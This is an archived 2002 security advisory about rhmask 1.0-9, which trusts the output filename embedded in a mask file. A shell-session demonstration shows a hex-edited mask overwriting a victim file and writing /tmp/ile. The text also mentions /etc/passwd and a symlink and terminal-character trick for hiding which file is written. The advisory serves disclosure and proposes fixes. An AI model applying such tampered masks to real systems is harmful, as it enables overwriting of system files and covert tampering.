13th Jun 2002 [SBWID-5431]
COMMAND
rhmask file overwrite
SYSTEMS AFFECTED
rhmask 1.0-9
PROBLEM
Andrew Griffiths [http://www.tasmail.com] found following:
rhmask is intended to allow the distribution of files as masks against
other files. This lets new versions of software be freely distributed
on public internet servers but limits their usefulness to those who
already have a copy of the package. It uses a simple XOR scheme for creating
the file mask and uses file size and md5 sums to ensure the integrity
of the result.
Problem
=======
rhmask will blindly trust the output filename in the mask given to it.
This allows, for example, overwriting of /etc/passwd (or creatation).
(Subject to the priviledges that ran rhmask , of course).
Notes
=====
Files created will be created with 0666 (subject to your umask). If a
person has a umask of 0, files will be readable + writable by all.
(duh)
rhmask takes different filesizes.
Demonstration
=============
[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >old_file
> this is the old version
> _EOF_
[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >new_file
> this is the new version
> _EOF_
[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >victim
> I\'m a helpless victim file
> _EOF_
[andrewg@blackhole rhmask_test]$ rhmask -d old_file new_file
replace_old_file.mask
[andrewg@blackhole rhmask_test]$ rm -f new_file
[andrewg@blackhole rhmask_test]$ rhmask old_file
replace_old_file.mask
generating new_file
[andrewg@blackhole rhmask_test]$ cat new_file
this is the new version
[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask
7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2new_file
[andrewg@blackhole rhmask_test]$ ht replace_old_file.mask
[ ht is a binary editor for linux ]
[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask
7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2victim
[andrewg@blackhole rhmask_test]$ rhmask old_file
replace_old_file.mask
generating victim
[andrewg@blackhole rhmask_test]$ cat victim
this is the new version
[ you killed kenny! ]
[andrewg@blackhole rhmask_test]$ rhmask -d old_file new_file
replace_old_file.mask
[andrewg@blackhole rhmask_test]$ ht replace_old_file.mask
[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask
7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2/tmp/ile
[andrewg@blackhole rhmask_test]$ rm -f /tmp/ile
[andrewg@blackhole rhmask_test]$ rhmask old_file
replace_old_file.mask
generating /tmp/ile
[andrewg@blackhole rhmask_test]$ cat /tmp/ile
this is the new version
Severity
========
Well, this part being the most subjective, I would say its rather low,
as it tells you the file name as it does it. However, since it also
follows symlinks, you could probably make a /tmp symlink with terminal
characaters in to overwrite the filename. Possibly along the lines of a
file of \'/tmp/symlink^Mgenerating harmless\' which should output
\"generating harmless\" to appear... however, when harmless doesn\'t
appear or hasn\'t changed their will be most likely suspicion. file
also has the same problem with terminal charaters in the data it reads
and outputs.
SOLUTION
Firstly, have it ignore or complain about slashes in the filename. Have
it prompt you if the target filename is a symbolic link.
[ In my oponion, sign the maskfile & make sure you check the
signature before using it. Oh, and don\'t obtain the maskfile +
signature + public key of the person from the same place. ]
Besides, the author (Erik Troan, ewt@redhat.com) was informed about
this a couple of months ago, and he told me this was a non-issue as
RedHat where moving to a different system.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
